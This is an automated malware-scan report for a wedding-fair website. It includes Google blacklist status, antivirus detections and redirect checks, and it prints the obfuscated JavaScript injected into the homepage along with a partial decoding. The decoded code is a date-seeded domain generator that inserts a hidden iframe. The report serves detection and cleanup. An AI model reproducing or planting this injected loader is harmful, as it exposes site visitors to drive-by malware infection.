New scan:

Malware Scanner report for hochzeitsmessen-remsmurr.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "hochzeitsmessen-remsmurr.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hochzeitsmessen-remsmurr.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://hochzeitsmessen-remsmurr.com/
200 OK
Content-Length: 6846
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["ev"+"al"]}}
if(1){f=[91,105,97,88,104,92,100,98,19,99,89,107,105,70,84,99,88,98,98,66,104,98,86,88,103,28,28,112,1,-3,21,20,19,21,106,84,103,20,91,94,20,48,21,104,91,94,103,33,104,89,88,89,20,34,21,104,91,94,103,33,70,47,0,-1,20,19,21,20,105,86,102,19,97,99,19,50,20,103,93,93,102,35,103,88,90,88,19,26,20,103,93,93,102,35,69,46,2,-2,19,21,20,19,107,85,101,21,104,88,104,104,19,50,20,103,93,93,102,35,53,19,31,20,95,
... 3008 bytes are skipped ...
5,100,88,108,35,85,99,101,89,97,89,55,91,94,96,87,29,93,89,103,97,28,48,1,-3,-2,-3,-4,94,90,101,86,97,88,76,85,102,56,102,88,86,104,88,89,20,48,21,104,101,106,89,46,2,-2,19,21,20,19,21,20,19,21,113,0,-1,20,19,21,20,112,88,85,103,88,92,27,90,29,110,94,90,101,86,97,88,76,85,102,56,102,88,86,104,88,89,20,48,21,105,97,89,89,89,94,98,88,89,47,112,2,-2,112,33,20,36,37,36,28,48];}w=f;s=[];r=String;for(i=0;-i+1771!=0;i+=1){j=i;s=s+r.fromCharCode((w[j]*1+e("j"+"%"+3)+11));}
if(012===10)e("if(1)"+s);

Decoded script:


if(1)function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = Math.ceil(d.getHours()/3);
this.seed = 23456789
... 4669 bytes are skipped ...
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
iframeWasCreated = true;
}
} catch (e) {
iframeWasCreated = undefined;
}
}, 100 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return

Antivirus reports:

Ikarus
Exploit.JS.Blacole
K7AntiVirus
Trojan
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
F-Prot
JS/IFrame.QW
Commtouch
JS/IFrame.QW

http://hochzeitsmessen-remsmurr.com/test404page.js
404 Not Found
Content-Length: 478
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 00:29:26 GMT
Accept-Ranges: bytes
ETag: "4d6a8be-1abe-4c80048561980"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6846
Content-Type: text/html
Last-Modified: Fri, 24 Aug 2012 10:17:26 GMT

...6846 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Referer: http://www.google.com/search?q=hochzeitsmessen-remsmurr.com

Result:
The result is similar to the first query. There are no suspicious redirects found.